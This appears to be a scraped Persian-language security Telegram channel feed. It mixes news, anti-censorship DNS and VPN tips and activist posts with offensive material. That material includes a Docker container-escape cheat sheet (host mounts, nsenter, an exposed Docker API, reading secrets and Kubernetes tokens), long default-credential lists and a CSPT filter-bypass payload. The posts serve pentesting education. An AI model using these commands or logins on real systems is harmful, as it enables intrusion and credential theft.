Privilege escalation using Linux capabilities🍸

@mandegar_sec | channel
Group™️

Читать полностью…

Password reset checklist

@mandegar_sec | channel
Group🕊

Читать полностью…

نام کتاب : The Hacker Mindset

ترجمه شده توسط : Typhon✍️

تاریخ انتشار : 2026/1/31

+ نسخه فارسی |

#رایگان_برای_اعضای_چنل
channel : @persian_b_sec

Читать полностью…

عزیزان برای اینکه چنل بهم نریزه
کانفیگ ها و روش ها در این تاپیک قرار میگیره❤️

/channel/sec_gap/27493

#freeWorld

Читать полностью…

Cache Deception + CSPT: 👾
Turning Non Impactful Findings into Account Takeover

توجه شمارو جلب میکنم به این مقاله که نشون میده دو باگ (Cache Deception و CSPT) ، اگه هوشمندانه با هم ترکیب بشن چجوری میتونن به Account Takeover واقعی ختم بشن.

https://zere.es/posts/cache-deception-cspt-account-takeover/

برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
@mandegar_sec | channel
Group ™️

Читать полностью…

https://github.com/4n0nymou3/cloudflare-doh-proxy
این dns over https هم جالبه
باهاش میشه ‌twitter , youtube بدون فیلتر باز کرد
مطمن نیستم ولی طولانی مدت ممکنه ایپی ایران بخوره داخل توییتر

Читать полностью…

جلسه اول کارگاه فارنزیک

Читать полностью…

#DefaultCredentials

1. Cisco

User: cisco
Password: cisco

2. Citrix

User: nsroot
Password: nsroot

3. Dell iDRAC

User: root
Password: calvin

4. Juniper

User: super
Password: juniper123

5. pfSense

User: admin
Password: pfsense

6. SAP

User: SAP*
Password: 06071992

7. Tomcat

User: tomcat
Password: tomcat

8. UniFi

User: ubnt
Password: ubnt

9. Weblogic

User: weblogic
Password: weblogic1

10. Zabbix

User: Admin
Password: zabbix

11. Windows

User: Administrator
Password: P@ssw0rd

برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel

Читать полностью…

مرکز ماهر هک شد😐😂🤦‍♂

Читать полностью…

746 استاد دانشگاه به سران قوا نامه زدن و درخواست کردن پلتفرم‌هایی مثل اینستاگرام برای همیشه مسدود بشن و هر چه سریع‌تر مسیر پیشرفت نرم‌افزار‌های داخلی مهیا بشه.

Читать полностью…

http://test67.liara.run

اینرو یکی از دوستان فرستاد
اگ وصل بگید❤️🕊

Читать полностью…

وقتی در گودال هستی، دیگر لازم نیست نگران سقوط باشی.

مالون می‌میرد
ساموئل بکت

Читать полностью…

دوستان dns tunnel با dnstt و ریزالور زیر کار میکنه میتونید وصل شید
2.188.21.130


به امید روزای بهتر🤍

Читать полностью…

سلام دوستان.
اپلیکیشن سایفریا ساخته شده که وقتی کانفیگی رو در محیطی غیر از تلگرام برای کسی ارسال میکنید، اون کانفیگ فیلتر نشه.

کانفیگتونو وارد میکنید. با یک کلید رمزنگاری میکنید، برای شخص مورد نظر متن رمزنگاری شده را ارسال میکنید.

شخص مقابل کلید شما و متن رمزنگاری را وارد میکند و کانفیگ را به دست می اورد.

موفق باشید❤️

(کاملا لوکال و اوپن سورس، بدون نیاز به هیچ دسترسی ای)

Web App for iOS 📱
WebApp


📎 GitHub Link:
✨ Feel free to fork the project
https://github.com/aradazr/Cypheria


App File for Android 🤖
📎 Download link available here

Читать полностью…

TOP DOCKER ESCAPES🥇

docker run -v /:/mnt -it alpine chroot /mnt

The "Master Key". If socket is mounted, grants root access to host.

mkdir /mnt/host && mount /dev/sda1 /mnt/host

Privileged Mode. Mounts the host's physical drive to access files.

nsenter --target 1 --mount --uts --ipc --net --pid

PID Injection. If --pid-host, injects into host's init process to get shell.

capsh --print grep "cap_sys_admin"

Capability Check. Checks for SYS_ADMIN. Essential for cgroup exploits.

 docker -H tcp://TARGET_IP:2375 run -v /:/host -it alpine

Exposed API. Exploits insecure remote Docker port (2375) to run containers.

cat /proc/1/cgroup | grep -i docker

Environment Check. Confirms if the current shell is inside a container.

find / -name docker. sock 2>/dev/null

Socket Hunt. Searches the container to find if the docker socket is mounted.

env | grep -iE "pass | secret | key token"

Secret Hunting. Finds keys or passwords hardcoded in env vars.

uname -r

Kernel Check. Shared host kernel means old versions allow Dirty COW escapes.

cat /var/run/secrets/kubernetes.io/serviceaccount/token

K8s Breakout. If present, extracts the Service Account Token to attack the Kubernetes API.

ip route show | grep default

Find Host IP. Default gateway points to Host. Target for internal scans.

 fdisk -l | head

Disk Check. If you can see the host's partition table, you are Privileged.

@mandegar_sec | GROUP™️
❤️💻

Читать полностью…

🍏 سرور جدید 🇩🇪 Npv Tunnel   
مناسب: همراه اول و ایرانسل
📶حجم 500 گیگ

متصل پینگ 220✅

اینترنت آزاد برای همه یا هیچ کس!
@OniyxVpn

Читать полностью…

If you are tryint to exploit a CSPT and the sequence ".." is blocked, you can try the following: ".%0a./.%0a./"

"\t", "\n" and "\r" will all be removed from the input before starting to parse

@mandegar_sec | channel
Group™️

Читать полностью…

🚨 Malicious EPUBs.

یه کمپین جدید داره از CVE-2023-44451 توی Xreader لینوکس مینت سوء استفاده میکنه.

سناریوش اینجوریه که مهاجم با Directory Traversal میره سراغ فایل‌ های حساس، بعدش هم با پیلود پایتونی Fileless کارشو ادامه میده؛ بدون اینکه فایل مشخصی روی دیسک بذاره.
همین باعث میشه شناسایی و دیـتکت شدنش برای انتی‌ ویروس‌ ها و ابزارهای امنیتی خیلی سخت‌تر بشه.
خلاصه اگه لینوکس مینت دارید یا با Xreader کار می‌کنید، این یکی رو دست‌ کم نگیرید.

📄: https://bit.ly/49O6Ym3

برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
@mandegar_sec | channel
Group™️

Читать полностью…

https://www.linkedin.com/posts/reza-sharifzade-649a8b18a_the-first-course-in-2026-course-start-09-activity-7422967784654966785-h3sO?utm_medium=ios_app&rcm=ACoAACynbdkBjwS7XkCf7Nkb04x0i6a-3_jtLFM&utm_source=social_share_send&utm_campaign=copy_link

Читать полностью…

سعید سوزنگر، مصطفی موسوی و ایمان صیرفی از بچه‌های فعال آیتی دستگیر شدن. حداقل‌ترین کاری که می‌تونیم بکنیم اینه که صداشون باشیم و اطلاع‌رسانی کنیم.

این پست رو توی گروه‌های مرتبط با Tech فوروارد کنید، اگه کانال دارید اسم و عکسشونو بذارید. یادتون باشه که هر کدوم از ما می‌تونستیم جای اونا باشیم. ✌🏻❤️

Читать полностью…

تسلیت به خانواده‌ های داغ‌ دار

این روزهای تلخ
درد شما، درد ماست. در غمتان شریکیم.

Читать полностью…

#DefaultCredentials - Part 2 🔐

1. VMware vCenter

User: administrator@vsphere.local
Password: Admin!23

1. Fortinet FortiGate

User: admin
Password: [blank]

1. F5 BIG-IP

User: admin
Password: admin

1. Palo Alto Networks

User: admin
Password: admin

1. Check Point

User: admin
Password: admin

1. Jenkins

User: admin
Password: password

1. GitLab

User: root
Password: 5iveL!fe

1. Grafana

User: admin
Password: admin

1. Kibana

User: elastic
Password: changeme

1. MongoDB

User: admin
Password: admin

1. PostgreSQL

User: postgres
Password: postgres

1. Oracle Database

User: SYSTEM
Password: manager

1. Redis

No authentication

1. Apache Tomcat

User: tomcat
Password: tomcat

1. JBoss

User: admin
Password: admin

1. HP iLO

User: Administrator
Password: [on device label]

1. Dell iDRAC

User: root
Password: calvin

1. Supermicro IPMI

User: ADMIN
Password: ADMIN

1. Cisco IOS

User: cisco
Password: cisco

1. Juniper

User: root
Password: [blank]

1. MikroTik

User: admin
Password: [blank]

1. Ubiquiti

User: ubnt
Password: ubnt

1. Hikvision Camera

User: admin
Password: 12345

1. Dahua Camera

User: admin
Password: admin

1. Synology NAS

User: admin
Password: [blank]

1. QNAP NAS

User: admin
Password: admin

1. Raspberry Pi

User: pi
Password: raspberry

1. Siemens S7 PLC

No authentication

1. Schneider Electric

User: USER
Password: USER

1. TP-Link Router

User: admin
Password: admin

1. Netgear

User: admin
Password: password

1. HP Printer

User: admin
Password: [blank]

1. Xerox Printer

User: admin
Password: 1111

1. Brother Printer

User: admin
Password: access

1. RabbitMQ

User: guest
Password: guest

1. Kubernetes Dashboard

No auth by default

1. Docker Registry

No auth by default

1. Artifactory

User: admin
Password: password

1. Nexus

User: admin
Password: admin123

1. SonarQube

User: admin
Password: admin

1. Atlassian Jira

User: admin
Password: admin

1. Confluence

User: admin
Password: admin

1. pfSense

User: admin
Password: pfsense

1. OPNsense

User: root
Password: opnsense

1. Sophos UTM

User: admin
Password: admin

1. WatchGuard

User: admin
Password: readwrite

1. Fortigate SSL VPN

User: admin
Password: [blank]

1. Pulse Secure

User: admin
Password: admin123

1. Aruba

User: admin
Password: admin

1. Ruckus Wireless

User: super
Password: sp-admin

برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel

#InfoSec #PenTesting #BugBounty #DefaultCredentials #SecurityResearch

Читать полностью…

کلیه ویدیوها و فایل‌های ارسالی توسط هانترهای ایرانی به مرکز ماهر، شامل تصاویر، ویدیوها، فایل‌های PDF و مستندات متنی که به‌عنوان PoC ارسال شده بودند، توسط ما به‌صورت کامل استخراج و دامپ شده‌اند.

نکته قابل توجه آن است که هیچ‌یک از گزارش‌های ارسال‌شده توسط این هانترها مورد پیگیری مؤثر قرار نگرفته است. برای مثال، در سال ۲۰۲۳ یکی از افراد وابسته به یکی از سازمان‌های ایرانی یک آسیب‌پذیری از نوع RCE را گزارش کرده که این باگ همچنان در سامانه مربوطه بدون اصلاح باقی مانده است!!

Читать полностью…

خودتون رو برای سخت‌تر شدن دسترسی‌ها و خاموشی بعدی آماده کنین!

بیشتر از ۲ هفته از قطع سراسری اینترنت بین‌الملل در ایران میگذره، ولی حالا که بصورت موقت دسترسی‌ها درحال برقرار شدنه، خودتون رو برای خاموشی قریب‌الوقوع بعدی آماده کنین:

- نصب ابزارهای ارتباطی P2P (مثل نقطه‌ها، زنجیر، Bridgefy و Bitchat)
- نصب اپ توشه یا رستم‌مدیا (برای دریافت اخبار از طریق ماهواره)
- تهیه استارلینک (تهیه پرریسک و نیازمند داشتن توان مالی)
- تهیه سیمکارت از کشورهای همسایه (اگر نزدیک به مرز هستید)
- بروز نگه‌داشتن اپ‌های VPN (حتی اگر درست کار نمی‌کردن)
و ...

👉 t.me/ircf_toolbox/16

🔍 ircf.space
@ircfspace

Читать полностью…

خب کم کم آیپی های کلودفلر باز شد

Ipin1.Oldinomi.com
104.18.32.47
chatgpt.com
chat.openai.com
open.chatgpt.com
104.18.32.47
216.239.38.120
3.160.196.89
162.159.152.4

اینارو تست کنین بجای ip های chatgpt.com

GROUP ™️
@mandegar_sec | channel

Читать полностью…

#Dns

185.98.113.113
185.98.114.114
....
172.20.11.11
172.20.11.12
...
8.26.56.26
5.200.200.200
...

@mandegar_sec | channel
Group™️

Читать полностью…

کلاینت و سرورش رو میتونید از این ادرس دانلود کنید

https://5688.s3.ir-thr-at1.arvanstorage.ir/dnstt-client-linux-amd64?versionId=

https://5688.s3.ir-thr-at1.arvanstorage.ir/dnstt-server-linux-amd64?versionId=

Читать полностью…

بلاخره وصل شد این نت🤦‍♂

Читать полностью…

کانتینر = ماشین مجازی نیست 🛑

خیلی از دولوپرها فکر می‌کنن همین که کد داخل Docker اجرا میشه، یعنی امنه.
در حالی که گاهی فقط یه فلگ اشتباه مثل --privileged یا

mount کردن
/var/run/docker.sock

کافیه تا یه باگ داخل کانتینر تبدیل بشه به تصاحب کامل سیستم میزبان.

اینجاست که بحث Container Escape مطرح میشه؛ مهارتی حیاتی برای دنیای امروز Cloud Security و Red Teaming.

این cheat sheet قراره ۱۲ روش مهم برای خارج شدن از sandbox کانتینر رو پوشش بده؛ از misconfiguration های رایج گرفته تا abuse کردن capability ها و دسترسی‌های خطرناک.

📌 جمع‌بندی کوتاه:
کانتینرها لایه‌ی امنیتی هستن، نه دیوار نفوذ ناپذیر.
اگه درست کانفیگ نشن، فاصله‌ی کانتینر تا Host فقط یه دستور ساده‌ست 🔥

برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel

Читать полностью…

فوووری

یه فرد ناشناس که ۲ روز پیش ایجاد شده اومده و ۳۰ هزار دلار شرط بسته روی اینکه چین تا قبل از اتمام ۲۰۲۶ به تایوان حمله میکنه !
اگر درست باشه ۳۰۰ هزار دلار برنده میشه !

همچین فردی هفته پیش ۳۰ هزار دلار روی دستگیری مادورو توسط آمریکا شرط بست و ۴۰۰ هزار دلار بنده شد !!



GROUP ™️
@mandegar_sec | channel

Читать полностью…